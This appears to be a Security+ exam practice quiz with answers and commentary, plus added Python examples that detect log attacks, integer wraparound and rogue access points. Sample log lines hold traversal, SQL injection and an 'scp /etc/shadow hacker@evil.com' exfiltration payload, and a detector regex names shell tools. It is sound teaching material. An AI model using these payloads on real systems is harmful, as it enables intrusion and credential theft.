Domain 1 Quiz

  1. Assign the attack names at right to the descriptions at left. You use each attack name once. Something like "Number 5 matches e", for numbers 1 through 4. On the real exam, this will take the form of pull-down menus by each description.
    1. Walking down the street, you get advertising messages from stores you are walking past
    2. You hear from friends that contact information they shared only with you seems to be loose on the Internet
    3. You receive text messages containing random advertisements
    4. You receive recorded phone calls that you believe are in Mandarin, a language you don't speak
    a. SPIM
    b. Bluesnarfing
    c. Vishing
    d. Bluejacking
    1=d, 2=b, 3=a, 4=c

    Bluejacking = illicit and unwanted connections, "Bluetooth hijacking", pushing out advertising from the nearby store. I don't know if this is a threat in the real world, but it is in the question pool.

    Bluesnarfing = an illicit Bluetooth connection stole your address book.

    SPIM = Spam over Instant Messaging.

    Vishing = like phishing (non-targeted) but over voice, from spoofed caller numbers. I live in West Lafayette, just down the street from Purdue University, with a large number of foreign students. I get frequent calls from a spoofed Chicago number with a recorded Chinese message with background music. I've been told they're borderline scams from immigration law firms.
  2. Liz is a security analyst for the IT department of a large university with a correspondingly large number of users. She has been investigating a sophisticated privilege escalation attack. She has determined that the attacker used an ordinary user account with a rather large user ID number. The attack changed that to a very low user ID number, associated with a highly privileged system account. Which of these did the attack utilize?
    1. Improper account configuration
    2. Memory leak
    3. Buffer overflow
    4. Integer overflow
    5. Race condition
    The idea is that the UID was so large that it rolled over MAX_INT (or the maximum integer representable in the programming language on that architecture). The Y2K problem was this in two base-ten digits. With unsigned integers on 32-bit hardware, not paying attention to this problem:
    2^32 - 1 = 4,294,967,295
    but:
    4,294,967,295 + 1 = 0
    Don't know too much! That makes it hard. CompTIA is probably posing their question in a 16-bit world, if not an 8-bit one.
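As an added example (my own code, not the quiz's or its author's), here is the kind of narrowing bug the question describes: a UID that does not fit the storage field silently wraps around to 0, the privileged account, unless the field width is checked first. The 16-bit record layout and the function names are assumptions; `wrap_unsigned` also reproduces the 32-bit arithmetic shown above.

```python
import ctypes

# Constructed scenario (an assumption, not from the quiz): a legacy record
# stores the UID in a fixed-width 16-bit field, the "16-bit world" the quiz
# hints at. The same wraparound happens at 2**32 for a 32-bit field.
UID_FIELD_BITS = 16
UID_FIELD_MAX = (1 << UID_FIELD_BITS) - 1   # 65535
ROOT_UID = 0                                 # the highly privileged account


def wrap_unsigned(value: int, bits: int) -> int:
    """Unsigned modular arithmetic, which is what C does silently on overflow.
    wrap_unsigned(2**32, 32) == 0, matching the quiz's 4,294,967,295 + 1 = 0."""
    return value & ((1 << bits) - 1)


def store_uid_unchecked(uid: int) -> int:
    """Narrow into the 16-bit field without a range check; ctypes truncates
    exactly like a C assignment, so 65536 lands on 0 (root)."""
    return ctypes.c_uint16(uid).value


def store_uid_checked(uid: int) -> int:
    """Hardened version: refuse any UID that does not fit the field."""
    if not 0 <= uid <= UID_FIELD_MAX:
        raise ValueError(f"uid {uid} does not fit in {UID_FIELD_BITS} bits")
    return uid


def is_privileged(stored_uid: int) -> bool:
    """True when the stored value names the root account."""
    return stored_uid == ROOT_UID


if __name__ == "__main__":
    big = UID_FIELD_MAX + 1                  # 65536, the "rather large" UID
    stored = store_uid_unchecked(big)
    print(f"unchecked: {big} -> {stored}, privileged={is_privileged(stored)}")
    try:
        store_uid_checked(big)
    except ValueError as err:
        print("checked:", err)
```

The unchecked path is the vulnerability; the checked path is the one-line range test that closes it. Any place an identifier crosses from a wide type to a narrower one (a database column, a wire format, a C struct field) needs the same test.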
  3. You observe the following.
    66.249.79.158 - - [01/Jul/2020:00:00:17 +0000] "GET /travel/uk/ben-nevis/ HTTP/1.1" 200 16745 "-" TLSv1.2 ECDHE-ECDSA-CHACHA20-POLY1305
    54.36.148.211 - - [01/Jul/2020:00:01:30 +0000] "GET /travel/usa/new-york-internet/ HTTP/1.1" 200 80277 "-" - -
    174.58.65.29 - - [01/Jul/2020:00:02:27 +0000] "GET /../../../etc/passwd HTTP/1.1" 200 25310 "https://www.bing.com/" - -
    174.58.65.29 - - [01/Jul/2020:00:02:27 +0000] "GET /travel/japan/kamakura/ HTTP/1.1" 200 25310 "https://www.bing.com/" - -
    66.102.9.57 - - [01/Jul/2020:00:03:52 +0000] "GET / HTTP/1.1" 200 5050 "-" - -
    
    What type of attack has happened?
    1. SQL Injection
    2. Directory Traversal
    3. Buffer Overflow
    4. Command Injection
    They tried to send the web server up out of the web content area and down into the /etc configuration area on a UNIX-family operating system.
  4. You observe the following.
    66.249.79.158 - - [01/Jul/2020:00:00:17 +0000] "GET /travel/uk/ben-nevis/ HTTP/1.1" 200 16745 "-" TLSv1.2 ECDHE-ECDSA-CHACHA20-POLY1305
    54.36.148.211 - - [01/Jul/2020:00:01:30 +0000] "GET /travel/usa/new-york-internet/ HTTP/1.1" 200 80277 "-" - -
    174.58.65.29 - - [01/Jul/2020:00:02:27 +0000] "GET /cgi-bin/?cmd=scp%20/etc/shadow%20hacker@evil.com HTTP/1.1" 200 25310 "https://www.bing.com/" - -
    174.58.65.29 - - [01/Jul/2020:00:02:27 +0000] "GET /travel/japan/kamakura/ HTTP/1.1" 200 25310 "https://www.bing.com/" - -
    66.102.9.57 - - [01/Jul/2020:00:03:52 +0000] "GET / HTTP/1.1" 200 5050 "-" - -
    
    What type of attack has happened?
    1. SQL Injection
    2. Directory Traversal
    3. Buffer Overflow
    4. Command Injection
    Know that %20 is the URL encoding of a space character (ASCII 0x20). Notice the string:
    scp%20/etc/shadow%20hacker@evil.com
    which decodes to:
    scp /etc/shadow hacker@evil.com
    That's the syntax to use scp to make an SSH connection as user hacker at host evil.com, and copy the file /etc/shadow (which contains the password hashes of every local user account on the web server host!) to that user's home directory on that remote server.
  5. You observe the following.
    66.249.79.158 - - [01/Jul/2020:00:00:17 +0000] "GET /travel/uk/ben-nevis/ HTTP/1.1" 200 16745 "-" TLSv1.2 ECDHE-ECDSA-CHACHA20-POLY1305
    54.36.148.211 - - [01/Jul/2020:00:01:30 +0000] "GET /travel/usa/new-york-internet/ HTTP/1.1" 200 80277 "-" - -
    174.58.65.29 - - [01/Jul/2020:00:02:27 +0000] "GET /database/'%20OR%201=1%20;-- HTTP/1.1" 200 25310 "https://www.bing.com/" - -
    174.58.65.29 - - [01/Jul/2020:00:02:27 +0000] "GET /travel/japan/kamakura/ HTTP/1.1" 200 25310 "https://www.bing.com/" - -
    66.102.9.57 - - [01/Jul/2020:00:03:52 +0000] "GET / HTTP/1.1" 200 5050 "-" - -
    
    What type of attack has happened?
    1. SQL Injection
    2. Directory Traversal
    3. Buffer Overflow
    4. Command Injection
    The URL-decoded string is:
    ' OR 1=1 ;--
    the classic SQL injection payload: a quote to close the string, an always-true condition, and a comment marker to discard the rest of the query.
    An alternative version of this question is a description, "You notice strange punctuation marks in the log."
  6. You are examining web server logs, and you notice some unusually long requests. What type of attack has happened?
    1. SQL Injection
    2. Directory Traversal
    3. Buffer Overflow
    4. Command Injection
    They hoped to send too much data to a privileged service that did not check input length to make sure it had enough memory to store the input.
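Questions 3 through 6 are all answered by reading the request line of a web server log, so here is an added example (my own code, not the quiz's or its author's) that parses Common Log Format lines like the ones above, URL-decodes the request target, and tags the four attack types the questions ask about. The sample log is constructed: the hostile lines are copied from the quiz, and one over-long request is built to stand in for question 6. The regexes are deliberately simple indicators for teaching, not a production WAF rule set.

```python
import re
from urllib.parse import unquote

# Constructed sample log: the hostile lines are the quiz's own examples, plus
# one over-long request (built below) for the "unusually long request" case.
SAMPLE_LOG = [
    '66.249.79.158 - - [01/Jul/2020:00:00:17 +0000] "GET /travel/uk/ben-nevis/ HTTP/1.1" 200 16745 "-" TLSv1.2 ECDHE-ECDSA-CHACHA20-POLY1305',
    '174.58.65.29 - - [01/Jul/2020:00:02:27 +0000] "GET /../../../etc/passwd HTTP/1.1" 200 25310 "https://www.bing.com/" - -',
    '174.58.65.29 - - [01/Jul/2020:00:02:27 +0000] "GET /cgi-bin/?cmd=scp%20/etc/shadow%20hacker@evil.com HTTP/1.1" 200 25310 "https://www.bing.com/" - -',
    '174.58.65.29 - - [01/Jul/2020:00:02:27 +0000] "GET /database/\'%20OR%201=1%20;-- HTTP/1.1" 200 25310 "https://www.bing.com/" - -',
    '198.51.100.7 - - [01/Jul/2020:00:04:10 +0000] "GET /search?q=' + 'A' * 600 + ' HTTP/1.1" 414 0 "-" - -',
    '66.102.9.57 - - [01/Jul/2020:00:03:52 +0000] "GET / HTTP/1.1" 200 5050 "-" - -',
]

# Common Log Format prefix: client, identd, user, timestamp, request, status, size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>HTTP/[\d.]+)" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)

MAX_TARGET_LEN = 512                                  # "unusually long" threshold (assumption)
TRAVERSAL_RE = re.compile(r'(?:^|/|\\)\.\.(?:/|\\|$)')  # ../ or ..\ path segments
SQLI_RE = re.compile(r"(?i)'\s*(?:or|and)\b|\bunion\b.{0,40}\bselect\b|;\s*--|--\s*$")
CMD_RE = re.compile(r'(?:^|[=\s;&|`])(?:scp|ssh|cat|nc|wget|curl|bash|sh|perl|python)\b')


def fully_decode(s: str, rounds: int = 3) -> str:
    """URL-decode until stable, so double-encoded payloads are seen in the clear."""
    for _ in range(rounds):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s


def classify(raw_target: str) -> list:
    """Return the attack tags that apply to one request target (empty if benign)."""
    tags = []
    decoded = fully_decode(raw_target)
    path, _, query = decoded.partition('?')
    if len(raw_target) > MAX_TARGET_LEN:
        tags.append('buffer overflow')        # question 6: unusually long request
    if TRAVERSAL_RE.search(path):
        tags.append('directory traversal')    # question 3: ../ climbing out of the docroot
    if SQLI_RE.search(decoded):
        tags.append('sql injection')          # question 5: quote, OR 1=1, comment marker
    if CMD_RE.search(query):
        tags.append('command injection')      # question 4: a shell command in a parameter
    return tags


def parse_line(line: str):
    """Parse one log line into a dict of fields, or None if it is not CLF."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def scan(lines) -> list:
    """Return (client ip, decoded target, tags) for every suspicious request."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        tags = classify(rec['target'])
        if tags:
            hits.append((rec['ip'], fully_decode(rec['target']), tags))
    return hits


if __name__ == "__main__":
    for ip, target, tags in scan(SAMPLE_LOG):
        print(f"{ip:15} {', '.join(tags):20} {target[:60]}")
```

Decoding first matters: the command injection line only reads as `scp /etc/shadow hacker@evil.com` once `%20` is turned back into spaces, and the same is true of the `'%20OR%201=1` payload. Note also that all the hostile requests returned status 200, so the status code alone would not have caught them; the request content has to be inspected.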
  7. You observe the following in the results of a security scan. What is this?
    Channel SSID
    1 corpnet3
    6 corpnet3
    6 netgear
    11 corpnet3
    1. Evil twin
    2. Rogue AP
    3. Bluesmacking
    4. Watering hole
    The third one in the list has a default SSID, the name of a major manufacturer. It may have many security problems caused by other default settings.
  8. Last week Ann, a staff member in the Human Resources department, did a Google search and clicked on one of the links on the first page of results. That took her to a strange page. She went back, realized she had misspelled her search, corrected that, and found what she needed. Today she logged on to her bank site from work and noticed some mysterious transfers from her account to a bank in Eastern Europe. What has happened?
    1. Clickjacking
    2. Ransomware
    3. Crimeware
    4. Extortionware
    5. Spyware
    The tipoff is transfers out of her bank account, which CompTIA associates with "crimeware". Clickjacking could have to do with how it happened, but the question asks you to name the event. Ransomware would be the answer if she was told to pay to recover her data from deletion or encryption, extortionware if she was told to pay to avoid the exposure of embarrassing information (which might be untrue), spyware would have to do with sensitive information being stolen. If you say "Yes, but if there was spyware that could lead to stealing her banking credentials, and that could lead to the transfers", you are building a more complicated answer.
  9. You observe the following in the results of a security scan. What is this?
    Channel SSID
    1 corpnet3
    6 corpnet3
    6 corpnet3
    11 corpnet3
    1. Evil twin
    2. Rogue AP
    3. Bluesmacking
    4. Watering hole
    In the CompTIA universe, no organization is large enough to need more than three WAPs. Nor does it have a large enough facility to have two WAPs on the same channel at either end of the building. And, apparently, all WLANs are 802.11b/g/n/ax in North America, so there are 11 channels. So, either the 2nd or 3rd in the list is a fake set up to attract connections.

    In case Bob hasn't remembered to tell you this part yet...

    The three useful channels (in the CompTIA universe) are 1, 6, and 11. If you get a "configure this network" diagram involving wireless, carefully look all around it to see what fixed wireless is already there.

    If you are configuring the only WAP, use channel 6 as it's the middle of the band and the antenna(s), always a compromise, will work best there.

    If you are configuring an additional WAP, and there's already just one on either channel 1 or 11, pick the opposite end.

    If there are two others, pick whichever of 1, 6, and 11 isn't yet in use.
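The two wireless scan questions (7 and 9) and the channel advice just above reduce to a small inventory check, so here is an added example (my own code, not the quiz's or its author's) that parses the "Channel SSID" listings shown in those questions, flags an SSID that is not in the corporate inventory as a rogue AP, flags a surplus access point advertising the corporate SSID as a possible evil twin, and encodes the author's channel rule of thumb. The authorized layout (one corpnet3 AP on each of channels 1, 6 and 11) is an assumption; a real check would compare BSSIDs, not just SSIDs and channels.

```python
from collections import Counter

# Constructed inventory (an assumption, not from the quiz): the authorized WLAN
# is exactly one corpnet3 access point on each non-overlapping 2.4 GHz channel.
CORPORATE_SSID = "corpnet3"
AUTHORIZED_CHANNELS = {1, 6, 11}

ROGUE = "rogue AP: SSID not in the corporate inventory"
EVIL_TWIN = "possible evil twin: extra AP advertising the corporate SSID"

# The two listings from questions 7 and 9, copied as text.
SCAN_Q7 = """Channel SSID
1 corpnet3
6 corpnet3
6 netgear
11 corpnet3
"""

SCAN_Q9 = """Channel SSID
1 corpnet3
6 corpnet3
6 corpnet3
11 corpnet3
"""


def parse_scan(text: str) -> list:
    """Turn a 'Channel SSID' listing into (channel, ssid) tuples, skipping the header."""
    rows = []
    for line in text.strip().splitlines()[1:]:
        channel, ssid = line.split(None, 1)
        rows.append((int(channel), ssid))
    return rows


def assess(rows) -> list:
    """Return (channel, ssid, finding) for every access point that should not be there."""
    findings = []
    corp_per_channel = Counter(ch for ch, ssid in rows if ssid == CORPORATE_SSID)
    for ch, ssid in rows:
        if ssid != CORPORATE_SSID:
            findings.append((ch, ssid, ROGUE))
        elif ch not in AUTHORIZED_CHANNELS or corp_per_channel[ch] > 1:
            # A second corpnet3 on an already-used channel: one of them is fake,
            # and with only SSID and channel to go on, both get flagged.
            findings.append((ch, ssid, EVIL_TWIN))
    return findings


def recommend_channel(in_use) -> int:
    """The channel rule of thumb from the text: alone, use 6; one AP already on
    1 or 11, take the opposite end; otherwise whichever of 1, 6, 11 is free."""
    used = set(in_use)
    if not used:
        return 6
    if used == {1}:
        return 11
    if used == {11}:
        return 1
    free = sorted(AUTHORIZED_CHANNELS - used)
    return free[0] if free else None


if __name__ == "__main__":
    for label, scan in (("question 7", SCAN_Q7), ("question 9", SCAN_Q9)):
        print(label)
        for ch, ssid, finding in assess(parse_scan(scan)):
            print(f"  channel {ch:2} {ssid:10} {finding}")
```

Because the scan data carries no BSSID or signal strength, the evil-twin case cannot say which of the two channel-6 corpnet3 entries is the impostor; a wireless IDS resolves that by comparing the radio MAC against the inventory of deployed access points.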
  10. Shonda, a security auditor at a financial institution, discovered an advanced attack that had stolen and exfiltrated a great deal of sensitive information. She searched a database for details of the attack, but found nothing. After a great deal of investigation and research, she discovered that it seems to be a new vulnerability with no available patch, and she implemented a workaround. What did she discover?
    1. False-positive event
    2. False-negative event
    3. Zero-day event
    4. IDS failure event
    5. IPS failure event
    "In a database" is CompTIA's allusion to MITRE's CVE list.
  11. Shari, a network engineer at a major health care facility, has determined that when the head of the Radiology department authenticated to the medical image database server, the encrypted traffic was captured by an intruder. That intruder later transmitted that information again to access the database as the highly privileged account. What type of attack is this?
    1. APT
    2. Rootkit
    3. Rogue AP
    4. Replay
    Lots of clutter and distraction around a simple story: Someone authenticated, the attacker recorded and retransmitted (replayed) it to get in. On the actual CompTIA exam they might include the head of Radiology's name, what category of images she was looking at, and so on.
  12. Desmond, a network engineer, has been directed to set up network security that will require a device to authenticate itself onto the network and verify that patching and anti-virus signatures are updated, before allowing the user to try to authenticate. What should Charlie use?
    1. 802.1i
    2. 802.1x
    3. 802.1q
    4. 802.11i
    A.k.a. Network Access Control or NAC, or Port Security.
  13. Mehmet, the database administrator, has discovered that a user has accidentally deleted an entire database table. What went wrong?
    1. Misconfigured account
    2. Untrained user
    3. Inadequate input validation
    4. Memory leak
    The user shouldn't have been able to destroy the database table.
  14. News reports tell of a major DDoS against a famous company. Meanwhile, you receive a letter from your ISP saying that your home computer is sending malicious Linux-sourced traffic. But you don't own a Linux computer, in fact you don't own any computer. Your home electronics are limited to a smart TV with a Blu-ray player and a DVR. What has happened?
    1. Nothing, your ISP is wrong
    2. RAT
    3. BOT
    4. Trojan
    Smart TVs, Blu-ray players, and DVRs all run Linux, although their owners rarely know this. They're based on rather old versions, usually with a 2.2.26 kernel from 2004, often with well-known default passwords, and with no way to patch or reconfigure it. It has become a 'bot or zombie in a DDoS attack. Yes, the perpetrator is controlling it, but not doing any RAT-like abuse (collecting data from your house, interacting with you), and they didn't have to tempt you with a Trojan to get in. My guess would be that your router has PnP or Plug-and-Play turned on, and they connected in — the Mirai botnet did exactly this, with huge numbers of IoT devices running Telnet service with a known default password. Yes, the premise of this question seems strange, you get a letter at home, but questions very much like this are in the pool. I got two or three questions set at home, one very similar to this.
  15. Jim is a software developer. Tina, his manager, has asked him to list software design and development security issues to share with new team members. Which of these is the reason for most software vulnerabilities?
    1. Improper input handling
    2. Inadequate error handling
    3. Support beyond end-of-life
    4. Default configurations
    User input may be hostile. It must be validated and either rejected or corrected if of inappropriate size, format, syntax, semantics, etc.
  16. Inga, a security analyst at a government agency, is inspecting the components of her operating system. She had identified what looks like a compatibility driver, but she suspects that it is being used by malware to monitor keystrokes and steal other data. If so, what malware technique has she discovered?
    1. Driver masquerading
    2. Shimming
    3. Driver refactoring
    4. Data flow manipulating
    Driver shimming can be legitimately used to make an older 32-bit driver compatible with a 64-bit operating system. However, malicious software can masquerade as a legitimate shim.

    This is an example of CompTIA's focus on memorizing sometimes arbitrary terminology. In the real world there may be other, equally valid, terms. But to get the point on the exam, you have to pick CompTIA's preferred terminology.
  17. Alexandra is a White Hat penetration tester doing a Black Box attack. She is using software to automatically submit queries to the search form on a web page. What is she doing?
    1. Active reconnaissance
    2. Passive reconnaissance
    3. Open-source analysis
    4. Pivoting
    It is active, not passive, because her software is sending inputs and interacting with the web server. It isn't open-source because Black Box implies the opposite. Pivoting means breaking into one system, using it as a foothold to attack other systems inside.
  18. Jermain has been trying to print a document on a nearby printer. It is operational; from time to time it produces a print job and someone from several offices down the hall arrives to collect their output. What is probably responsible? Select two.
    1. Bluesnarfing
    2. Bluesmacking
    3. Bluejacking
    4. Jamming
    5. Bluesniffing
    "Bluesmacking" is a made-up alternative term for jamming Bluetooth radio signals. Andy is sitting close enough to normally be in range of Bluetooth. People down the hall must be using different technology to send their print jobs.
  19. Vladimir has written some malicious software that adds unneeded loops, NOPs, and other ineffectual code every time it is executed or spread to a new platform. What technique is he using?
    1. Refactoring
    2. Shimming
    3. Masquerading
    4. Modifying
    It literally modifies the code, but "refactoring" is what you must select to get the point. The changes make automated detection much more difficult.
  20. Peter is a security analyst at a bank. The bank wants to extend its use of an outdated operating system, as the alternative would require replacing all their existing automated teller machines built into storefronts and standalone brick kiosks. What problem will they have to solve?
    1. Embedded systems
    2. EOL
    3. IoT
    4. Input validation
    5. Error handling
    End of Life. Many deployed ATMs still run Windows XP. Embedded and IoT become more tempting with the emphasis on the ATMs being built into enclosures. Proper and complete input validation and error handling are, of course, very important, but the question is about things they haven't yet done.

Exhibit with 4 items plus 19 questions

Passing = 82% of 23 = 18.9

Goal = 91% of 23 = 20.9
